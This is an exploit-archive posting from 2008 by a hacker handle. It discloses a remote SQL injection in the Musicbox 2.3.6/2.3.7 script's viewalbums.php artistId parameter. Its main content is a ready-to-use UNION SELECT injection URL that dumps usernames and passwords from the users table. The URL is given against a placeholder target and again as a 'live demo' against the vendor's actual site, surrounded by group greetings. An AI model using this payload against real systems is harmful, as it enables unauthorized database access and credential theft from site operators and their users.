[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Musicbox <= 2.3.7 (artistId) Remote SQL Injection Vulnerability
# Published : 2008-05-07
# Author : HaCkeR_EgY
# Previous Title : ezContents CMS 2.0.0 Multiple Remote SQL Injection Vulnerabilities
# Next Title : PHPEasyData 1.5.4 (cat_id) Remote SQL Injection Vulnerability
#########################################
# Rem0te SQL Injection Vulnerability #
# Musicbox [viewalbums.php] #
########################################
[<>]Author: HaCkeR-EgY
[<>]H^0mE: www.pal-hacker.com , atsdp.com
[<>]CONTact: hacker_EGY@hotmail.com
===========================================================
[<>]Script : Musicbox
[<>]version : Version 2.3.6 / 2.3.7
[<>]Script Price: Only $ 255.00
[<>]Download : www.musicboxv2.com
============================================================
[<>] D0RK : ... you know
[<>] ExPLO!t :
===>
http://www.target.com/version2.3.7/viewalbums.php?artistId=-1/**/union/**/select/**/1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10/**/from/**/users/*
[<>] live DemO :
===>
http://www.musicboxv2.com/version2.3.7/viewalbums.php?artistId=-1/**/union/**/select/**/1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10/**/from/**/users/*
==============================================================
[<>] Thanx : MY Brotha and MY Master " Abo Mohamed "
[<>] Greetz : F!resell , Mohamed el Arab ,Mr.EXE , DaRk MaStEr ,H-T Team
Gold_M , V4 Team , Jiki Team , RoMaNcYxHaCkEr
===============================================================
# www.Syue.com [2008-05-07]